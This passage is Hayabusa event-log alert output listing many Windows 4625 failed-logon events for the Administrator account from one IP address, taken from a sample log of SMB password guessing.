NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpnyzkXasuyAtdn1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ps9IqJzTliJvzpIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V7PLb2uRTIY8t123 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sHAJ9p0QbSRxhvtk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YRiE1wGrwWAx0feP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Flo4bCVjmlaHz0QS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HscUujSzd3Ua7dqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aIQPTx67aEer51wb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MqUoXUf7PKIaoDjs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wzeB4DAS1W633tmh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTtXTrqHoCZMbDLT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 4HVv5PgPhiDW3qcj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g21VoO45UrIbTuZO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGpD7AJUTekDmd6Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OykzTOn7B9THv0cT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cIYOrBBwX8nFpCzw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SvnROHLMVnmPfAyy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5EwJ84H7kXQXzGZz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34RLeLWDgLayU3JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QaXHGUgboODAi5Qu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlOlZ0m397CsmaeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N24rSPCI8DsQIPXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5y2tgoUcs6mFPZm4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HmFX6MioYqaMumgw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R4HRWlPWPKy1Cicq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GDUf7wVbHkS9uaPC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eBX0Lviz6Bv5rGcb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zZwPm9qahLU78FRY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: jOVsopykTHNQcYUp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n8DY7sdDY8nuWdME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rTxEVu7mudXEBARZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7ohqvCoOLkFRcqvE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: me8rikVJqcKxvHdq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oLqVmqCmHTrD7V8V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:11.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ySdyzxvDasHgjq0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.312 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N2auwOc1wemq76n1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgK6lHgC5WOBk4kW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2GG0bKgusKqseQij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpHm7DcOmhq4rkaX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OX1vVGrE7fJSMEiZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 65i7wtyAhL58QrzC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k8uSVFRTLTB6g1eg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ire6VOUMWZQnNjES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pGWnvKUXnbJvRqql | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBVvrrLf1rnAviKS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: NE9atGNBlSLQLLcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a0M5EaAXziu07hOH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PM1mwxqI7yVgoK2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPqnpvetHXdThxYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gthbVQMJ7UD2QS7H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwwJXCoC3gMDoDn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ilNNoVbZpyhtsNkV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eNY0lv9IglfHP34d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjSeQciwy17L7raV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wycE1fIsmPq9zaMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5z1spxImm2ZlGOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dg7o4GCET1bJrlEU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E7Db3OLA0XPXL1B4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uoqx5iPRp2tfYYos | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ixw5XWC2frtrTUkv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3v0NpzAp7io9gbZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
